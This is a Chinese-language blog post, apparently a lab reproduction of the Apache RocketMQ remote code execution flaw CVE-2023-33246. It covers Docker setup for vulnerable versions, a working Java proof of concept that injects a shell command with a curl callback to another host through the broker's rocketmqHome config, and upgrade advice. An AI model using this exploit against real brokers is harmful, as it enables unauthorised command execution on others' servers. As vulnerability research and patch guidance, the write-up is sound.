RocketMQ远程代码执行(CVE-2023-33246)
前言
RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。
详情:https://mp.weixin.qq.com/s/FZ3NyR8YnqWHn1pv_Dmtyg
影响版本
Apache RocketMQ <= 5.1.0
Apache RocketMQ <= 4.9.5
环境搭建
下载镜像
docker pull apache/rocketmq:4.9.1
docker pull apacherocketmq/rocketmq-console:2.0.0
启动namesrv
docker run -d -p 9876:9876 -v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv
创建目录
mkdir -p /mydata/rocketmq/conf/
在宿主机创建broker配置文件, 启动broker服务需要,我这里的路径为: /mydata/rocketmq/conf/broker.conf
文件内容(vim /mydata/rocketmq/conf/broker.conf)
brokerClusterName = DefaultCluster
brokerName = broker-a
brokerId = 0
deleteWhen = 04
fileReservedTime = 48
brokerRole = ASYNC_MASTER
flushDiskType = SYNC_FLUSH
brokerIP1 = 192.168.88.104
注:192.168.88.104为我的宿主机IP
启动broker
docker run -d -p 10911:10911 -p 10909:10909 -v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /mydata/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /opt/rocketmq/conf/broker.conf
启动console
docker run -d --name rmqconsole -p 8899:8080 --link rmqnamesrv:namesrv
-e "JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876
-Dcom.rocketmq.sendMessageWithVIPChannel=false"
-t apacherocketmq/rocketmq-console:2.0.0
最后访问8899得到如下
POC攻击
下载地址:
https://github.com/I5N0rth/CVE-2023-33246
mqrce.java
package org.example;
import org.apache.rocketmq.tools.admin.DefaultMQAdminExt;
import java.util.Properties;
/**
* Created by IntelliJ IDEA.
*
* @Author: Garck3h
* @Date: 2023/5/31
* @Time: 20:22
* Life is endless, and there is no end to it.
**/
public class mqrce {
public static void main(String[] args) throws Exception {
String[] urls = {"192.168.88.104:8899"};
for (int i = 0; i < urls.length; i++) {
updateConfig(urls[i]);
}
}
public static void updateConfig(String url) throws Exception {
Properties props = new Properties();
props.setProperty("rocketmqHome","-c $@|sh . echo curl 192.168.1.7:8877");
props.setProperty("filterServerNums","1");
// 创建 DefaultMQAdminExt 对象并启动
DefaultMQAdminExt admin = new DefaultMQAdminExt();
admin.setNamesrvAddr("192.168.88.104:9876");
admin.start();
// 更新配置⽂件
admin.updateBrokerConfig(url, props);
Properties brokerConfig = admin.getBrokerConfig(url);
System.out.println(brokerConfig.getProperty("rocketmqHome"));
System.out.println(brokerConfig.getProperty("filterServerNums"));
// 关闭 DefaultMQAdminExt 对象
admin.shutdown();
}
}
maven配置文件pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.example</groupId>
<artifactId>test1</artifactId>
<version>1.0-SNAPSHOT</version>
<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<dependency>
<groupId>org.apache.rocketmq</groupId>
<artifactId>rocketmq-tools</artifactId>
<version>4.9.1</version>
</dependency>
</dependencies>
</project>
修复建议
目前官方已发布安全修复更新,受影响用户可以升级到Apache RocketMQ 5.1.1或者4.9.6
https://rocketmq.apache.org/download/
原文始发于微信公众号(pentest):RocketMQ远程代码执行(CVE-2023-33246)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论